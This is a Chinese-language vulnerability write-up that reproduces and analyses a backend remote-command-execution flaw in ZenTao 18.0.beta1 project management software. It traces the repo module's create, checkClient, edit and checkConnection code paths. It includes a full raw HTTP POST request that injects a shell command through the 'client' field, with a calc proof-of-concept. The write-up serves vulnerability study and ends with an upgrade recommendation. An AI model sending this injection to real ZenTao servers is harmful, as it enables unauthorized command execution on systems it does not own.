漏洞簡介

禪道是第一款國產的開源項目管理軟件。它集產品管理、項目管理、質量管理、文檔管理、 組織管理和事務管理于一體，是一款專業的研發項目管理軟件，完整地覆蓋了項目管理的核心流程。
禪道管理思想注重實效，功能完備豐富，操作簡潔高效，界面美觀大方，搜索功能強大，統計報表豐富多樣，軟件架構合理，擴展靈活，有完善的 API 可以調用。

禪道后臺存在 RCE 漏洞，均存在于歷史版本，對這些漏洞進行復現分析。

環境搭建

源碼下載地址 https://dl.cnezsoft.com/zentao/18.0.beta1/ZenTaoPMS.18.0.beta1.php7.2_7.4.zip

利用 phpstudy 來進行環境的搭建

漏洞復現

登錄后臺創建 GitLab 類型的代碼庫

點擊 DevOps 模塊的設置選項，修改創建的代碼庫

點擊保存并抓取數據包

修改參數 SCM 和 client SCM 修改為?Subversion?client 修改為?calc | echo "

觸發了命令執行，執行了兩次

漏洞分析

發現有一些分析文章中描述需要先創建一個代碼倉庫，也指出了創建代碼倉庫的原因，因為調用的是 edit 方法，所以要先 create

經過調試發現這是必須的，因為在沒創建代碼庫時，執行 edit 方法，會提示跳轉去創建代碼庫

module/repo/control.php#commonAction

所以需要先創建代碼庫

module/repo/control.php#create

module/repo/model.php#create

在創建代碼庫的時候有一個檢查 Client 的操作 只有選擇 Gitlab 才能不做客戶端的檢測操作，直接創建成功

module/repo/model.php#checkClient

創建成功后執行編輯操作觸發漏洞

POST /index.php?m=repo&f=edit&repoID=0 HTTP/1.1
Host: test.test
Content-Length: 36
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://test.test
Referer: http://test.test/index.php?m=repo&f=edit&repoID=1&objectID=0
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=bp9k0pcftu49b2ethm9f32hc5b; lang=zh-cn; device=desktop; theme=default; preExecutionID=1; moduleBrowseParam=0; productBrowseParam=0; executionTaskOrder=status%2Cid_desc; windowWidth=1440; windowHeight=722; tab=devops; repoBranch=master;XDEBUG_SESSION=PHPSTORM
Connection: closeSCM=Subversion&client= calc | echo "

module/repo/control.php#edit

module/repo/model.php#update

module/repo/model.php#checkConnection

修復建議

更新至最新版本